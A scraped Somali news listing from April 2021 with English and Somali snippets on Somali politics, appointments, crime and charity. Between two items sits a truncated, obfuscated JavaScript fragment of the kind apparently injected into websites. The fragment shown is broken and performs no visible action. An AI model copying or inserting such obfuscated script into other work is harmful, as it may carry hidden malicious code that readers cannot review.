Arab League voices concern over the recent situation in Somalia
The Arab League (AL) on Thursday voiced deep concerns over the recent situation in Somalia and the ongoing critical conditions for reaching a political dialogue among different parties.
The AL called in a statement on the federal government, the governments of different regional states, and the other Somali parties to reach a political solution...
African Union to meet over the situations in Chad and Somalia
The African Union Peace and Security Council has announced that it will hold a meeting today Thursday 22 April 2021, at 12:30pm EAT over the situation in Chad.
The Security Council also announced that it would also meet today over the situation in Somalia.
On Monday, Somali President Mohamed Farmaajo welcomed...
DF Soomaaliya oo digniin u jeedisay Jabuuti iyo Kenya
Wasiirka Wasaaradda Warfaafinta, Dhaqanka iyo Dalxiiska ee Xukuumadda Federaalka Soomaaliya mudane Cismaan Abuukar Dubbe oo shacabka si toos ah ugala hadlayay Warbaahunta Qaranka ayaa uga digay Dowladaha Jabuuti iyo Kenya inay farageliyaan go’aamada ka soo baxaya Midowga Afrika.
“Dowladda Soomaaliya iyo Midowga Afrika waxa ay horaanta todobaadkan ka wada hadleen sidii Midowga Afrika uu...
Wasiirka Arrimaha dibadda oo warbixin siiyey Midowga Afrika
Wasiirka Arrimaha Dibadda Soomaaliya, mudane Maxamed Cabdirisaaq ayaa uga warbixiyay Golaha Ammaanka Midowga Afrika xaaladda Siyaasadeed ee Soomaaliya.
Wasiirka waxa uu mar kale hoosta ka xariiqay in Dowladda Soomaaliya ay soo dhowaynayso fududaynta wadahadalo Siyaasadeed oo ku qotoma in Shacabka Soomaaliyeed ay doortaan Wakiilo.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...
Rooble oo war kasoo saaray dhacdadii garoonka Muqdisho
Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa sheegay in aan marnaba la aqbali karin dhacdadii foosha xumeyd ee ka dhacday garoonka diyaaradaha Aadan Cadde.
Ra’iisul Wasaare Rooble ayaa faray Wasaaradda Amniga iyo Hay’adaha kale ee ay khuseyso in ay baaritaan deg deg ah ku sameeyaan falkaas si dhaqso ahna sharciga loo...
Ganacsade Soomaali ah oo lagu dilay dalka Koonfur Afrika
Wararka laga helayo wadanka Koonfur Afrika ayaa sheegaya in saacadihii la soo dhaafay muwaadin Soomaali ah oo sidoo kale ka mid ah ganacsatada ku dhaqan gudaha dalkaasi lagu dilay duleedka magaalada Cape Town.
Marxuumka oo lagu magacaabi jiray, Maxamed Cabdullahi Gacaney ayaa dilkiisu waxa uu ka dhacay tuulada Khayelitsha oo ka tirsan magaalada Cape...
Aqriso: Madaxweynaha Puntland oo magacaabis sameeyey
Madaxweynaha maamulka Puntland Mudane Siciid Cabdullaahi Deni, ayaa soo saaray Xeer Madaxweyne Lr.16 oo uu ku magacaabay Guddoomiyaha Gobolka Sool.
Madaxweynaha Dowladda Puntland
Markuu arkay: Dastuurka Dowladda Puntland Qodobkiisa 80-aad.
Markuu arkay: Aqoontiisa iyo waayo-aragnimdiisa shaqo.
Markuu Tixgeliyey: Talo soo jeedinta Wasaaradda Arrimaha Gudaha, Federaalka...
Degmada Xamar Jajab oo loo magacaabay guddoomiye cusub
Wareegto ka soo baxday xafiiska guddoomiyaha gobolka Banaadir mudane Cumar Maxamed Maxamuud ayaa Mucaawiye Axmed Muudey, loogu magacaabay guddoomiyaha cusub ee degmada Xamar Jajab ee gobolka Banaadir.
Mucaawiye ayaa bedelay guddoomiyihii degmadaas, Allah u naxariistee, Maxamed Cabdi Axmed oo la dilay 17 bishan Abril ee sanadkan 2021-ka.
Guddoomiyaha cusub ayaa ah...
Deeq la gaarsiiyay haween danyar ah oo isugu jira naafo iyo dad da’ ah
Hay’ada Hormuud Salaam Foundation ayaa deeq lacageed waxa ay gaarsiisay Haween dan yar ah iyo kuwa baahiyaha gaarka qaba oo ay ku jiraan rag waayeela ah iyadoo lacagahaasi Hay’adu ugu talagashay in ay ukaashadaan afurka maadaama lagu jiro bisha barakeysan ee ramadaan.
Dadka danta yar ayaa lagasoo kala aruuriyay 17-ka degmo ee gobolka banaadir...
Shangaani oo xalay guul ka gaartay dhiggeeda Marko
Degmooyinka Shangaani iyo Marko oo ka kala tirsan gobollada Banaadir iyo Sh/Hoose ayaa xalay ku loolamay tartan aqooneedka faca weyn ee Shabakadda Warbaahinta Shabelle, iyaga oo soo bandhigay tartan aad u xiiso badan.
Labada degmo oo ku wada jiray group-ka E ayaa waxa ay guushu raacday tartamayaasha degmada Shangaani ee gobolka Banaadir.












